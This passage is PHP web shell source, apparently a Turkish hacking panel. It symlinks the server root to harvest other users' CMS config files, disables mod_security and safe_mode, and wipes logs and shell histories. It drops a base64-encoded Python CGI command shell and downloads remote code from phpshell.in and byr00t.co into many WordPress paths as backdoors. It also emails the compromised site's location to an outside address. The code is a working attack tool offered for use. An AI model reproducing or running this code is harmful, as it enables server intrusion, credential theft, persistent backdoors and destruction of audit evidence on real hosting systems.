$_POST[\'p1\']==\'config\') { echo "<center>";\r\n @mkdir(\'sym\',0777);\r\n $hdt = "Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $hfp = @fopen (\'sym/.htaccess\',\'w\');\r\n @fwrite($hfp ,$hdt);\r\n if(function_exists(\'symlink\')) { @symlink(\'/\',\'sym/root\');\r\n } $d0mains = @file(\'/etc/named.conf\');\r\n if(!$d0mains) { echo "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=\'center\' width=\'40%\' class=\'main\' ><tr><th> Count </th><th> Domains </th><th> Script </th></tr>";\r\n $count = 1;\r\n $l=0;\r\n foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);\r\n flush();\r\n if(strlen(trim($domain[1][0]))>2){ $user = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$domain[1][0]));\r\n $c1 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/wp-config.php\';\r\n $ch01 = get_headers($c1);\r\n $cf01 = $ch01[0];\r\n $c2 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/blog/wp-config.php\';\r\n $ch02 = get_headers($c2);\r\n $cf02 = $ch02[0];\r\n $c3 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/configuration.php\';\r\n $ch03 = get_headers($c3);\r\n $cf03 = $ch03[0];\r\n $c4 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/joomla/configuration.php\';\r\n $ch04 = get_headers($c4);\r\n $cf04 = $ch04[0];\r\n $c5 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/includes/config.php\';\r\n $ch05 = get_headers($c5);\r\n $cf05 = $ch05[0];\r\n $c6 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/vb/includes/config.php\';\r\n $ch06 = get_headers($c6);\r\n $cf06 = $ch06[0];\r\n $c7 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/forum/includes/config.php\';\r\n $ch07 = get_headers($c7);\r\n $cf07 = $ch07[0];\r\n $c8 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'public_html/clients/configuration.php\';\r\n $ch08 = get_headers($c8);\r\n $cf08 = $ch08[0];\r\n $c9 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/support/configuration.php\';\r\n $ch09 = get_headers($c9);\r\n $cf09 = $ch09[0];\r\n $c10 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/client/configuration.php\';\r\n $ch10 = get_headers($c10);\r\n $cf10 = $ch10[0];\r\n $c11 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/submitticket.php\';\r\n $ch11 = get_headers($c11);\r\n $cf11 = $ch11[0];\r\n $c12 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/client/configuration.php\';\r\n $ch12 = get_headers($c12);\r\n $cf12 = $ch12[0];\r\n $c13 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/includes/configure.php\';\r\n $ch13 = get_headers($c13);\r\n $cf13 = $ch13[0];\r\n $c14 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/include/app_config.php\';\r\n $ch14 = get_headers($c14);\r\n $cf14 = $ch14[0];\r\n $c15 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/sites/default/settings.php\';\r\n $ch15 = get_headers($c15);\r\n $cf15 = $ch15[0];\r\n $out = \'&nbsp;\r\n\';\r\n if(strpos($cf01,\'200\') == true) { $out = "<a href=\'".$c1."\' target=\'_blank\'>Wordpress</a>";\r\n } elseif(strpos($cf02,\'200\') == true) { $out = "<a href=\'".$c2."\' target=\'_blank\'>Wordpress</a>";\r\n } elseif(strpos($cf03,\'200\') == true && strpos($cf11,\'200\') == true) { $out = " <a href=\'".$c11."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf09,\'200\') == true) { $out = " <a href=\'".$c9."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf10,\'200\') == true) { $out = " <a href=\'".$c10."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf03,\'200\') == true) { $out = " <a href=\'".$c3."\' target=\'_blank\'>Joomla</a>";\r\n } elseif(strpos($cf04,\'200\') == true) { $out = " <a href=\'".$c4."\' target=\'_blank\'>Joomla</a>";\r\n } elseif(strpos($cf05,\'200\') == true) { $out = " <a href=\'".$c5."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf06,\'200\') == true) { $out = " <a href=\'".$c6."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf07,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf08,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Client Area</a>";\r\n } elseif(strpos($cf12,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Client Area</a>";\r\n } elseif(strpos($cf13,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>osCommerce/Zen Cart</a>";\r\n } elseif(strpos($cf14,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Magento</a>";\r\n } elseif(strpos($cf15,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Drupal</a>";\r\n } else { continue;\r\n } echo \'<tr\'.($l?\' class=l1\':\'\').\'><td>\'.$count++.\'</td><td><a href=http://www.\'.$domain[1][0].\'/>\'.$domain[1][0].\'</a></td><td>\'.$user[\'name\'].\'</td><td>\'.$out.\'</td></tr>\';\r\n flush();\r\n $l=$l?0:1;\r\n } } } echo "</table>";\r\n } echo "</center>";\r\n } echo "</div>";\r\n printFooter();\r\n } function actionSafeMode() { printHeader();\r\n echo \'<h1>Safe Mode</h1>\';\r\n echo \'<div class="content">\';\r\n echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir<br>| ".$GLOBALS[\'cwd\']." |<br><br />";\r\n echo \'<a href=# onclick="g(null,null,\\\'php.ini\\\',null)">| PHP.INI | </a><a href=# onclick="g(null,null,null,\\\'ini\\\')">| .htaccess(Mod) | </a><a href=# onclick="g(null,null,null,null,\\\'sh\\\')">| .htaccess(perl) | </a></center>\';\r\n if(!empty($_POST[\'p2\']) && isset($_POST[\'p2\'])) { $fil=fopen($GLOBALS[\'cwd\'].".htaccess","w");\r\n fwrite($fil,\'<IfModule mod_security.c>\r\n Sec------Engine Off\r\n Sec------ScanPOST Off\r\n </IfModule>\');\r\n fclose($fil);\r\n } if(!empty($_POST[\'p1\'])&& isset($_POST[\'p1\'])) { $fil=fopen($GLOBALS[\'cwd\']."php.ini","w");\r\n fwrite($fil,\'safe_mode=OFF\r\n disable_functions=NONE\');\r\n fclose($fil);\r\n } if(!empty($_POST[\'p3\']) && isset($_POST[\'p3\'])) { $fil=fopen($GLOBALS[\'cwd\'].".htaccess","w");\r\n fwrite($fil,\'Options FollowSymLinks MultiViews Indexes ExecCGI\r\n AddType application/x-httpd-cgi .sh\r\n AddHandler cgi-script .pl\r\n AddHandler cgi-script .pl\');\r\n fclose($fil);\r\n } echo "<br><br /><br /></div>";\r\n echo \'</div>\';\r\n printFooter();\r\n} function actionSQLBUDDY(){ printHeader();\r\n if(!file_exists(\'yazilimlar/sqlbuddy/index.php\')){ $dizin = \'https://byr00t.co/vb/sqlbuddy.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "sqlbuddy");\r\n $zip = new ZipArchive();\r\n $file = \'sqlbuddy.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'yazilimlar/\');\r\n if(file_exists(\'sqlbuddy.zip\')){ @unlink(\'sqlbuddy.zip\');\r\n } if($cikar){ echo "<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'yazilimlar/sqlbuddy/index.php\')){ echo "<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionDeleteLOG(){ printHeader();\r\n echo \'<h1>Delete Logs</h1>\';\r\n function cmdExe($in) { $out = \'\';\r\n if (function_exists(\'passthru\')) { ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n } else if (function_exists(\'exec\')) { @exec($in,$out);\r\n $out = @join("\\n",$out);\r\n } elseif (function_exists(\'system\')) { ob_start();\r\n @system($in);\r\n $out = ob_get_clean();\r\n } elseif (function_exists(\'shell_exec\')) { $out = shell_exec($in);\r\n } elseif (is_resource($f = @popen($in,"r"))) { $out = "";\r\n while(!@feof($f)) $out .= fread($f,1024);\r\n pclose($f);\r\n } return $out;\r\n } cmdExe("rm -rf /tmp/logs");\r\n cmdExe("rm -rf /root/.ksh_history");\r\n cmdExe("rm -rf /root/.bash_history");\r\n cmdExe("rm -rf /root/.bash_logout");\r\n cmdExe("rm -rf /usr/local/apache/logs");\r\n cmdExe("rm -rf /usr/local/apache/log");\r\n cmdExe("rm -rf /var/apache/logs");\r\n cmdExe("rm -rf /var/apache/log");\r\n cmdExe("rm -rf /var/run/utmp");\r\n cmdExe("rm -rf /var/logs");\r\n cmdExe("rm -rf /var/log");\r\n cmdExe("rm -rf /var/adm");\r\n cmdExe("rm -rf /etc/wtmp");\r\n cmdExe("rm -rf /etc/utmp");\r\n cmdExe("rm -rf $HISTFILE");\r\n cmdExe("rm -rf /var/log/lastlog");\r\n cmdExe("rm -rf /var/log/wtmp");\r\n echo \'<div style="padding:5px;\r\n">\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /tmp/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /root/.ksh_history <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /root/.bash_history <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /usr/local/apache/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /usr/local/apache/log <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/apache/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/apache/log <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/run/utmp <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/adm <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /etc/wtmp <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> $HISTFILE<br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/log/lastlog <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/log/wtmp <br>\r\n </div>\';\r\n printFooter();\r\n } function actionPython(){ printHeader();\r\n if(!is_dir(\'python\')){ mkdir(\'python\', 0755);\r\n } chdir(\'python\');\r\n$kokdosya = ".htaccess";\r\n $dosya_adi = "$kokdosya";\r\n $dosya = fopen ($dosya_adi , \'w\') or die ("Dosya a&#231;\r\n&#305;\r\nlamad&#305;\r\n!");\r\n $metin = "AddHandler cgi-script .r00t";\r\n fwrite ( $dosya , $metin ) ;\r\n fclose ($dosya);\r\n $pythonp = \'IyEvdXNyL2Jpbi9weXRob24KIyAwNy0wNy0wNAojIHYxLjAuMAoKIyBjZ2ktc2hlbGwucHkKIyBB\r\nIHNpbXBsZSBDR0kgdGhhdCBleGVjdXRlcyBhcmJpdHJhcnkgc2hlbGwgY29tbWFuZHMuCgoKIyBD\r\nb3B5cmlnaHQgTWljaGFlbCBGb29yZAojIFlvdSBhcmUgZnJlZSB0byBtb2RpZnksIHVzZSBhbmQg\r\ncmVsaWNlbnNlIHRoaXMgY29kZS4KCiMgTm8gd2FycmFudHkgZXhwcmVzcyBvciBpbXBsaWVkIGZv\r\nciB0aGUgYWNjdXJhY3ksIGZpdG5lc3MgdG8gcHVycG9zZSBvciBvdGhlcndpc2UgZm9yIHRoaXMg\r\nY29kZS4uLi4KIyBVc2UgYXQgeW91ciBvd24gcmlzayAhISEKCiMgRS1tYWlsIG1pY2hhZWwgQVQg\r\nZm9vcmQgRE9UIG1lIERPVCB1awojIE1haW50YWluZWQgYXQgd3d3LnZvaWRzcGFjZS5vcmcudWsv\r\nYXRsYW50aWJvdHMvcHl0aG9udXRpbHMuaHRtbAoKIiIiCkEgc2ltcGxlIENHSSBzY3JpcHQgdG8g\r\nZXhlY3V0ZSBzaGVsbCBjb21tYW5kcyB2aWEgQ0dJLgoiIiIKIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIEltcG9ydHMKdHJ5\r\nOgogICAgaW1wb3J0IGNnaXRiOyBjZ2l0Yi5lbmFibGUoKQpleGNlcHQ6CiAgICBwYXNzCmltcG9y\r\ndCBzeXMsIGNnaSwgb3MKc3lzLnN0ZGVyciA9IHN5cy5zdGRvdXQKZnJvbSB0aW1lIGltcG9ydCBz\r\ndHJmdGltZQppbXBvcnQgdHJhY2ViYWNrCmZyb20gU3RyaW5nSU8gaW1wb3J0IFN0cmluZ0lPCmZy\r\nb20gdHJhY2ViYWNrIGltcG9ydCBwcmludF9leGMKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBjb25zdGFudHMKCmZvbnRs\r\naW5lID0gJzxGT05UIENPTE9SPSM0MjQyNDIgc3R5bGU9ImZvbnQtZmFtaWx5OnRpbWVzO2ZvbnQt\r\nc2l6ZToxMnB0OyI+Jwp2ZXJzaW9uc3RyaW5nID0gJ1ZlcnNpb24gMS4wLjAgN3RoIEp1bHkgMjAw\r\nNCcKCmlmIG9zLmVudmlyb24uaGFzX2tleSgiU0NSSVBUX05BTUUiKToKICAgIHNjcmlwdG5hbWUg\r\nPSBvcy5lbnZpcm9uWyJTQ1JJUFRfTkFNRSJdCmVsc2U6CiAgICBzY3JpcHRuYW1lID0gIiIKCk1F\r\nVEhPRCA9ICciUE9TVCInCgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMgUHJpdmF0ZSBmdW5jdGlvbnMgYW5kIHZhcmlhYmxl\r\ncwoKZGVmIGdldGZvcm0odmFsdWVsaXN0LCB0aGVmb3JtLCBub3RwcmVzZW50PScnKToKICAgICIi\r\nIlRoaXMgZnVuY3Rpb24sIGdpdmVuIGEgQ0dJIGZvcm0sIGV4dHJhY3RzIHRoZSBkYXRhIGZyb20g\r\naXQsIGJhc2VkIG9uCiAgICB2YWx1ZWxpc3QgcGFzc2VkIGluLiBBbnkgbm9uLXByZXNlbnQgdmFs\r\ndWVzIGFyZSBzZXQgdG8gJycgLSBhbHRob3VnaCB0aGlzIGNhbiBiZSBjaGFuZ2VkLgogICAgKGUu\r\nZy4gdG8gcmV0dXJuIE5vbmUgc28geW91IGNhbiB0ZXN0IGZvciBtaXNzaW5nIGtleXdvcmRzIC0g\r\nd2hlcmUgJycgaXMgYSB2YWxpZCBhbnN3ZXIgYnV0IHRvIGhhdmUgdGhlIGZpZWxkIG1pc3Npbmcg\r\naXNuJ3QuKSIiIgogICAgZGF0YSA9IHt9CiAgICBmb3IgZmllbGQgaW4gdmFsdWVsaXN0OgogICAg\r\nICAgIGlmIG5vdCB0aGVmb3JtLmhhc19rZXkoZmllbGQpOgogICAgICAgICAgICBkYXRhW2ZpZWxk\r\nXSA9IG5vdHByZXNlbnQKICAgICAgICBlbHNlOgogICAgICAgICAgICBpZiAgdHlwZSh0aGVmb3Jt\r\nW2ZpZWxkXSkgIT0gdHlwZShbXSk6CiAgICAgICAgICAgICAgICBkYXRhW2ZpZWxkXSA9IHRoZWZv\r\ncm1bZmllbGRdLnZhbHVlCiAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICB2YWx1ZXMg\r\nPSBtYXAobGFtYmRhIHg6IHgudmFsdWUsIHRoZWZvcm1bZmllbGRdKSAgICAgIyBhbGxvd3MgZm9y\r\nIGxpc3QgdHlwZSB2YWx1ZXMKICAgICAgICAgICAgICAgIGRhdGFbZmllbGRdID0gdmFsdWVzCiAg\r\nICByZXR1cm4gZGF0YQoKCnRoZWZvcm1oZWFkID0gIiIiPEhUTUw+PEhFQUQ+PFRJVExFPmNnaS1z\r\naGVsbC5weSAtIGEgQ0dJIGJ5IEZ1enp5bWFuPC9USVRMRT48L0hFQUQ+CjxCT0RZPjxDRU5URVI+\r\nCjxIMT5XZWxjb21lIHRvIGNnaS1zaGVsbC5weSAtIDxCUj5hIFB5dGhvbiBDR0k8L0gxPgo8Qj48\r\nST5CeSBGdXp6eW1hbjwvQj48L0k+PEJSPgoiIiIrZm9udGxpbmUgKyJWZXJzaW9uIDogIiArIHZl\r\ncnNpb25zdHJpbmcgKyAiIiIsIFJ1bm5pbmcgb24gOiAiIiIgKyBzdHJmdGltZSgnJUk6JU0gJXAs\r\nICVBICVkICVCLCAlWScpKycuPC9DRU5URVI+PEJSPicKCnRoZWZvcm0gPSAiIiI8SDI+RW50ZXIg\r\nQ29tbWFuZDwvSDI+CjxGT1JNIE1FVEhPRD1cIiIiIiArIE1FVEhPRCArICciIGFjdGlvbj0iJyAr\r\nIHNjcmlwdG5hbWUgKyAiIiJcIj4KPGlucHV0IG5hbWU9Y21kIHR5cGU9dGV4dD48QlI+CjxpbnB1\r\ndCB0eXBlPXN1Ym1pdCB2YWx1ZT0iU3VibWl0Ij48QlI+CjwvRk9STT48QlI+PEJSPiIiIgpib2R5\r\nZW5kID0gJzwvQk9EWT48L0hUTUw+JwplcnJvcm1lc3MgPSAnPENFTlRFUj48SDI+U29tZXRoaW5n\r\nIFdlbnQgV3Jvbmc8L0gyPjxCUj48UFJFPicKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBtYWluIGJvZHkgb2YgdGhlIHNj\r\ncmlwdAoKaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIHByaW50ICJDb250ZW50LXR5cGU6\r\nIHRleHQvaHRtbCIgICAgICAgICAjIHRoaXMgaXMgdGhlIGhlYWRlciB0byB0aGUgc2VydmVyCiAg\r\nICBwcmludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBzbyBpcyB0aGlzIGJs\r\nYW5rIGxpbmUKICAgIGZvcm0gPSBjZ2kuRmllbGRTdG9yYWdlKCkKICAgIGRhdGEgPSBnZXRmb3Jt\r\nKFsnY21kJ10sZm9ybSkKICAgIHRoZWNtZCA9IGRhdGFbJ2NtZCddCiAgICBwcmludCB0aGVmb3Jt\r\naGVhZAogICAgcHJpbnQgdGhlZm9ybQogICAgaWYgdGhlY21kOgogICAgICAgIHByaW50ICc8SFI+\r\nPEJSPjxCUj4nCiAgICAgICAgcHJpbnQgJzxCPkNvbW1hbmQgOiAnLCB0aGVjbWQsICc8QlI+PEJS\r\nPicKICAgICAgICBwcmludCAnUmVzdWx0IDogPEJSPjxCUj4nCiAgICAgICAgdHJ5OgogICAgICAg\r\nICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0ID0gb3MucG9wZW4yKHRoZWNtZCkKICAgICAg\r\nICAgICAgY2hpbGRfc3RkaW4uY2xvc2UoKQogICAgICAgICAgICByZXN1bHQgPSBjaGlsZF9zdGRv\r\ndXQucmVhZCgpCiAgICAgICAgICAgIGNoaWxkX3N0ZG91dC5jbG9zZSgpCiAgICAgICAgICAgIHBy\r\naW50IHJlc3VsdC5yZXBsYWNlKCdcbicsICc8QlI+JykKCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlv\r\nbiwgZTogICAgICAgICAgICAgICAgICAgICAgIyBhbiBlcnJvciBpbiBleGVjdXRpbmcgdGhlIGNv\r\nbW1hbmQKICAgICAgICAgICAgcHJpbnQgZXJyb3JtZXNzCiAgICAgICAgICAgIGYgPSBTdHJpbmdJ\r\nTygpCiAgICAgICAgICAgIHByaW50X2V4YyhmaWxlPWYpCiAgICAgICAgICAgIGEgPSBmLmdldHZh\r\nbHVlKCkuc3BsaXRsaW5lcygpCiAgICAgICAgICAgIGZvciBsaW5lIGluIGE6CiAgICAgICAgICAg\r\nICAgICBwcmludCBsaW5lCgogICAgcHJpbnQgYm9keWVuZAoKCiIiIgpUT0RPL0lTU1VFUwoKCgpD\r\nSEFOR0VMT0cKCjA3LTA3LTA0ICAgICAgICBWZXJzaW9uIDEuMC4wCkEgdmVyeSBiYXNpYyBzeXN0\r\nZW0gZm9yIGV4ZWN1dGluZyBzaGVsbCBjb21tYW5kcy4KSSBtYXkgZXhwYW5kIGl0IGludG8gYSBw\r\ncm9wZXIgJ2Vudmlyb25tZW50JyB3aXRoIHNlc3Npb24gcGVyc2lzdGVuY2UuLi4KIiIi\';\r\n $file = fopen("python.r00t" ,"w+");\r\n $write = fwrite ($file ,base64_decode($pythonp));\r\n fclose($file);\r\n chmod("python.r00t",0755);\r\n echo "<iframe src=python/python.r00t width=100% height=100% frameborder=0></iframe> ";\r\n printFooter();\r\n } if( empty($_POST[\'a\']) ) if(isset($default_action) && function_exists(\'action\' . $default_action)) $_POST[\'a\'] = $default_action;\r\n else $_POST[\'a\'] = \'SecInfo\';\r\n if( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) ) call_user_func(\'action\' . $_POST[\'a\']);\r\n \r\n?>\r\n<?php if($_POST[\'query\']){ $veriyfy = stripslashes(stripslashes($_POST[\'query\']));\r\n $data = "data.txt";\r\n @touch ("data.txt");\r\n $ver = @fopen ($data , \'w\');\r\n @fwrite ( $ver , $veriyfy ) ;\r\n @fclose ($ver);\r\n }else{ $datas=@fopen("data.txt",\'r\');\r\n $i=0;\r\n while ($i <= 5) { $i++;\r\n $blue=@fgets($datas,1024);\r\n echo $blue;\r\n } } $datasi=@fopen("js/js.php",\'r\');\r\n if($datasi){ }else{ @mkdir("js");\r\n $dos = file_get_contents("http://phpshell.in/txt/lamer.txt");\r\n $data = "js/js.php";\r\n @touch ("js/js.php");\r\n $ver = @fopen ($data , \'w\');\r\n @fwrite ( $ver , $dos ) ;\r\n @fclose ($ver);\r\n $yol = "http://".$_SERVER[\'HTTP_HOST\']."".$_SERVER[\'REQUEST_URI\']."";\r\n $y = \'<h1>Sender Yazdirildi.<br/> SITE YOL : \'.$yol.\'<br/>Sender Yolu : js/js.php</h1>\';\r\n $header .= "From: SheLL Boot <suppor@nic.org>\\n";\r\n $header .= "Content-Type: text/html;\r\n charset=utf-8\\n";\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n } \r\n?>\r\n<?php\r\nfunction http_get($url){\r\n$im = curl_init($url);\r\ncurl_setopt($im, CURLOPT_RETURNTRANSFER, 1);\r\ncurl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);\r\ncurl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);\r\ncurl_setopt($im, CURLOPT_HEADER, 0);\r\nreturn curl_exec($im);\r\ncurl_close($im);\r\n}\r\n$check1 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-includes/js/js.php" ;\r\n$text1 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1 = fopen($check1, \'w\');\r\nfwrite($open1, $text1);\r\nfclose($open1);\r\nif(file_exists($check1)){\r\n}\r\n$check12 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-includes/index.php" ;\r\n$text12 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12 = fopen($check12, \'w\');\r\nfwrite($open12, $text12);\r\nfclose($open12);\r\nif(file_exists($check12)){\r\n}\r\n$check123 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/images/images.php" ;\r\n$text123 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123 = fopen($check123, \'w\');\r\nfwrite($open123, $text123);\r\nfclose($open123);\r\nif(file_exists($check123)){\r\n}\r\n$check12345 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/css/css.php" ;\r\n$text12345 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345 = fopen($check12345, \'w\');\r\nfwrite($open12345, $text12345);\r\nfclose($open12345);\r\nif(file_exists($check12345)){\r\n}\r\n$check123456 = $_SERVER[\'DOCUMENT_ROOT\'] . "/adm.php" ;\r\n$text123456 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456 = fopen($check123456, \'w\');\r\nfwrite($open123456, $text123456);\r\nfclose($open123456);\r\nif(file_exists($check123456)){\r\n}\r\n$check1234567 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/css.php" ;\r\n$text1234567 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567 = fopen($check1234567, \'w\');\r\nfwrite($open1234567, $text1234567);\r\nfclose($open1234567);\r\nif(file_exists($check1234567)){\r\n}\r\n$check12345678 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/install.php" ;\r\n$text12345678 = http_get(\'http://byr00t.co/txt/tools.txt\');\r\n$open12345678 = fopen($check12345678, \'w\');\r\nfwrite($open12345678, $text12345678);\r\nfclose($open12345678);\r\nif(file_exists($check12345678)){\r\n}\r\n$check123456789 = $_SERVER[\'DOCUMENT_ROOT\'] . "/cgi-bin/css.php" ;\r\n$text123456789 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456789 = fopen($check123456789, \'w\');\r\nfwrite($open123456789, $text123456789);\r\nfclose($open123456789);\r\nif(file_exists($check123456)){\r\n}\r\n$check12345678910 = $_SERVER[\'DOCUMENT_ROOT\'] . "/js/css.php" ;\r\n$text12345678910 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910 = fopen($check12345678910, \'w\');\r\nfwrite($open12345678910, $text12345678910);\r\nfclose($open12345678910);\r\nif(file_exists($check123456)){\r\n}\r\n$check1234567891011 = $_SERVER[\'DOCUMENT_ROOT\'] . "/css/css.php" ;\r\n$text1234567891011 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011 = fopen($check1234567891011, \'w\');\r\nfwrite($open123, $text1234567891011);\r\nfclose($open1234567891011);\r\nif(file_exists($check1234567891011)){\r\n}\r\n$check123456789101112 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-login.php" ;\r\n$text123456789101112 = http_get(\'http://phpshell.in/txt/seo.txt\');\r\n$open123456789101112= fopen($check123456789101112, \'w\');\r\nfwrite($open123456789101112, $text123456789101112);\r\nfclose($open123456789101112);\r\nif(file_exists($check123456789101112)){\r\n}\r\n$check12345678910111213 = $_SERVER[\'DOCUMENT_ROOT\'] . "/images/css.php" ;\r\n$textk12345678910111213 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$openk12345678910111213 = fopen($checkk12345678910111213, \'w\');\r\nfwrite($openk12345678910111213, $textk12345678910111213);\r\nfclose($openk12345678910111213);\r\nif(file_exists($checkk12345678910111213)){\r\n}\r\n$check1234567891011121314 = $_SERVER[\'DOCUMENT_ROOT\'] . "/img/css.php" ;\r\n$text1234567891011121314 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011121314 = fopen($checkk1234567891011121314, \'w\');\r\nfwrite($open1234567891011121314, $text1234567891011121314);\r\nfclose($open1234567891011121314);\r\nif(file_exists($check1234567891011121314)){\r\n}\r\n$check123456789101112131415 = $_SERVER[\'DOCUMENT_ROOT\'] . "/modules/css.php" ;\r\n$text123456789101112131415 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456789101112131415 = fopen($check123456789101112131415, \'w\');\r\nfwrite($open123456789101112131415, $text123456789101112131415);\r\nfclose($open123456789101112131415);\r\nif(file_exists($check123456789101112131415)){\r\n}\r\n$check12345678910111213141516 = $_SERVER[\'DOCUMENT_ROOT\'] . "/includes/css.php" ;\r\n$text12345678910111213141516 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910111213141516 = fopen($check12345678910111213141516, \'w\');\r\nfwrite($open12345678910111213141516, $text12345678910111213141516);\r\nfclose($open12345678910111213141516);\r\nif(file_exists($check12345678910111213141516)){\r\n}\r\n$check1234567891011121314151617 = $_SERVER[\'DOCUMENT_ROOT\'] . "/phpinfo.php" ;\r\n$text1234567891011121314151617 = 